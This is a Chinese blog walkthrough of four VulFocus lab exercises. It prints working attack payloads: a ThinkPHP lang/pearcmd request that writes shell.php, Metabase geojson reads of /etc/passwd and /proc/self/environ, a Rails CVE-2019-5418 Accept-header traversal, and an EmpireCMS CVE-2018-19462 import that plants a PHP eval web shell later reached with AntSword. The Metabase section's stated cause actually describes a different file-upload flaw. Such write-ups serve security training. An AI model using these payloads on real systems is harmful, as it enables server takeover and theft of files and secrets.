当前位置: 首页 > news >正文

漏洞指北-VulFocus靶场专栏-中级02

漏洞指北-VulFocus靶场专栏-中级02

  • 中级005 🌸thinkphp lang 命令执行(thinkphp:6.0.12)🌸
        • step1:burp suite 抓包 修改请求头
        • step2 修改成功,访问shell.php
  • 中级006 🌸Metabase geojson任意文件读取漏洞🌸
        • step1:进入环境
        • step2:使用/proc/self/environ来查看创建的变量来寻找flag.
  • 中级007 🌸Rails 文件读取 (CVE-2019-5418)🌸
        • step1:burpsuite 抓包改包
        • step2: 找response的flag
  • 中级008 🌸empire 代码执行 (CVE-2018-19462)🌸
        • step1:登入后台
        • step2 系统 -> 数据表表与系统模型 -> 管理数据表 -> 导入系统模型
        • step3 导入mod一句话木马
        • step4 中国蚁剑

中级005 🌸thinkphp lang 命令执行(thinkphp:6.0.12)🌸

原因
在其6.0.13版本及以前,存在一处本地文件包含漏洞。当多语言特性被开启时,攻击者可以使用lang参数来包含任意PHP文件。

虽然只能包含本地PHP文件,但在开启了register_argc_argv且安装了pcel/pear的环境下,可以包含/usr/local/lib/php/pearcmd.php并写入任意文件

访问路径诶:/public/index.php
解决方案:

step1:burp suite 抓包 修改请求头

GET /public/index.php?+config-create+/&lang=…/…/…/…/…/…/…/…/…/…/…/usr/local/lib/php/pearcmd&/<?=phpinfo()?>+/var/www/html/shell.php HTTP/1.1
在这里插入图片描述

step2 修改成功,访问shell.php

http://10.11.12.28:34081/shell.php
在这里插入图片描述

中级006 🌸Metabase geojson任意文件读取漏洞🌸

原因
稻草人企业站存在文件上传漏洞,攻击者可利用漏洞获取服务器控制权。 用户名密码:admin 123456 (网站)
解决方案:

step1:进入环境

http://10.11.12.28:49017/api/geojson?url=file:/etc/passwd
在这里插入图片描述

step2:使用/proc/self/environ来查看创建的变量来寻找flag.

/api/geojson?url=file:///proc/self/environ
在这里插入图片描述

中级007 🌸Rails 文件读取 (CVE-2019-5418)🌸

原因
Ruby on Rails 是一个用于开发数据库驱动的网络应用程序的完整框架。
在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。我们通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{头来构成构造路径穿越漏洞,读取任意文件。
解决方案:
访问靶场地址, 在chybeta文件下
通过传入Accept: …/…/…/…/…/…/…/…/proc/self/environ{{

step1:burpsuite 抓包改包

GET /chybeta HTTP/1.1

Accept: …/…/…/…/…/…/…/…/proc/self/environ{{

step2: 找response的flag

在这里插入图片描述

中级008 🌸empire 代码执行 (CVE-2018-19462)🌸

原因
该漏洞源于外部输入数据构造代码段的过程中,网路系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流 后台路径:/empirecms/e/admin 用户名密码:admin 123456
解决方案:

step1:登入后台

http://10.11.12.28:50933/empirecms/e/admin/
在这里插入图片描述

step2 系统 -> 数据表表与系统模型 -> 管理数据表 -> 导入系统模型

step3 导入mod一句话木马

<?php file_put_contents("shell.php","<?php @eval(\$_POST[cmd]); ?>");?>

在这里插入图片描述

step4 中国蚁剑

在这里插入图片描述

http://www.lryc.cn/news/133768.html

相关文章:

  • 【开源三方库】bignumber.js:一个大数数学库
  • 【C++】iota函数 + sort函数实现基于一个数组的多数组对应下标绑定排序
  • C# window forms 进度条实现
  • ListNode相关
  • docker的资源控制及docker数据管理
  • 通过请求头传数据向后端发请求
  • 产品流程图是什么?怎么做?
  • 面试之快速学习STL-map
  • ES的索引结构与算法解析
  • 32.Netty源码之服务端如何处理客户端新建连接
  • 代码随想录day11
  • RabbitMQ实习面试题
  • Electron入门,项目运行,只需四步轻松搞定。
  • 【C++】visualstudio环境安装
  • 使用MySQL:5.6和owncloud镜像搭建个人网盘
  • php中创建对象时传递的参数是构造方法
  • C++并发及互斥保护示例
  • 新手常犯的错误,anzo capital昂首资本一招避免少走弯路
  • Java Vue (el-date-picker组件) 前后端 关于时间格式数据的处理方法
  • Python爬虫——scrapy_多条管道下载
  • lombok启动不生效(什么方法都试了,可还是不生效怎么办 ?! 救救我)
  • element文本域禁止手动拉伸、两种方式、textarea
  • c#中lambda表达式缩写推演
  • 无涯教程-PHP - 循环语句
  • 思维进化算法(MEA)优化BP神经网络
  • Kotlin 中的 设计模式
  • Vulnhub: ICMP: 1靶机
  • 我的创作纪念日(C++修仙练气期总结)
  • css的常见伪元素使用
  • 91. 解码方法